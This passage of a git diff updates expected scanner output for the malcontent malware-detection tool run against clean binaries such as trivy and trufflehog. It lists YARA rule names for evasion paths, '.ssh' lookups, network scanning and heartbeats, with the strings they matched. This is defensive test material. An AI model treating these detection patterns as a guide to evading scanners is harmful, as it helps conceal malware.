[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | +| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | +| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple index cadf870be..ccd6f1313 100644 --- a/tests/linux/clean/trivy.simple +++ b/tests/linux/clean/trivy.simple @@ -61,10 +61,10 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/iptables: medium -evasion/covert_location/chdir_unusual: medium -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/chdir_unusual: medium +evasion/file/location/dev_shm: medium +evasion/file/location/var_run: medium +evasion/file/prefix: medium exec/cmd: medium exec/conditional/LANG: low exec/dylib/symbol_address: medium diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index b356f137f..f365f9270 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -46,8 +46,8 @@ | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) | -| MEDIUM | [evasion/hidden_paths/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) | +| MEDIUM | [evasion/file/location/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecCommand](https://github.com/search?q=ExecCommand&type=code)
[Execute_Command_Line](https://github.com/search?q=Execute_Command_Line&type=code)
[MergeRunCmdOptions](https://github.com/search?q=MergeRunCmdOptions&type=code)
[RunCommandCursor](https://github.com/search?q=RunCommandCursor&type=code)
[StartCmdTrace](https://github.com/search?q=StartCmdTrace&type=code)
[StartCommandOptions](https://github.com/search?q=StartCommandOptions&type=code)
[execTxCommand](https://github.com/search?q=execTxCommand&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[processRunCommand](https://github.com/search?q=processRunCommand&type=code)
[runGitCommand](https://github.com/search?q=runGitCommand&type=code)
[runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | | MEDIUM | [exec/script/osa](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/osascript.yara#osascript_caller) | osascript caller | [display dialog](https://github.com/search?q=display+dialog&type=code) | @@ -68,7 +68,7 @@ | MEDIUM | [fs/proc/self_mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | | MEDIUM | [impact/ddos](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ddos/ddos.yara#ddos) | References DDoS | [DDoS](https://github.com/search?q=DDoS&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
